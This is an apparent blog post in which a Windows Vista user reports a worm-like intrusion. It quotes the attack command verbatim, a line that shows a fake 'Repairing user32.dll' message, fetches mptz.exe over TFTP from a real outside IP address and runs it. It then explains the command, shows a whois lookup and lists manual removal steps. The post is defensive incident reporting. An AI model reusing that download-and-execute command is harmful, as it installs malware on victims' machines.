new virus ???

Goodmorning,

today I was working at my computer when unexpectedly the friendly Windows Vista Search System ( Search Utility) pop out…looking for…??????????????

%comspec% /c echo Repairing user32.dll & echo Please wait… & tftp -i 76.203.188.177 GET mptz.exe & start mptz&

well…I admit I love Vista….it’s so secure !!!!!!!!!!!!!
what, the hell,  is happening ???????
That Vista Firewall is working ???????????? or no????
And the Updates ???? why I’m installing each one if they’re useless ?????????

I’ve probably received a new connection from an unknown IP address…scanning..thousands of address….
and trying to spread himself…over MY network…using a Vista Bug…but what is happening NOW ?

The environment variable %comspec% given at the Run menù simply starts the default command shell (cmd.exe)…

Then this shell with echo shows “Repairing user32.dll & echo Please wait… ” after this…the system connects via FTP to 76.203.188.177 and with a GET command downloads mptz.exe and starts it with the start command…
and the virus…spreads again….
Unfortunately….the good Process Explorer helped me…KILLING the task……………….

Looking into google for mptz.exe…offers no results…so I think it is a new virus…starting in these days…

But who is 76.203.188.177 ???
at this whois service i got:

Registry Whois

OrgName:    AT&T Internet Services
OrgID:      SIS-80
Address:    2701 N. Central Expwy # 2205.14
City:       Richardson
StateProv:  TX
PostalCode: 75080
Country:    US

NetRange:   76.192.0.0 – 76.255.255.255
CIDR:       76.192.0.0/10
NetName:    SBCIS-SBIS-6BLK
NetHandle:  NET-76-192-0-0-1
Parent:     NET-76-0-0-0-0
NetType:    Direct Allocation
NameServer: NS1.SWBELL.NET
NameServer: NS2.SWBELL.NET
Comment:    Contact  for general IP
Comment:    Administration support.
RegDate:    2006-09-15
Updated:    2007-05-25

 

So ???? The AT&T System is trying to hack me ?????????? 😀

nooo……

anyway;

Solution: ” To Eliminate the Virus,
1_ KILL THE TASK named mptz.exe,

2_ then “jump” into your System32 dir

3_ and delete : mptz.exe, gebxwvv.dll and awtqp.dll

YOU are the only antivirus needed for your system

Hope this…was Useful…

Seeyou….

Technorati Tags: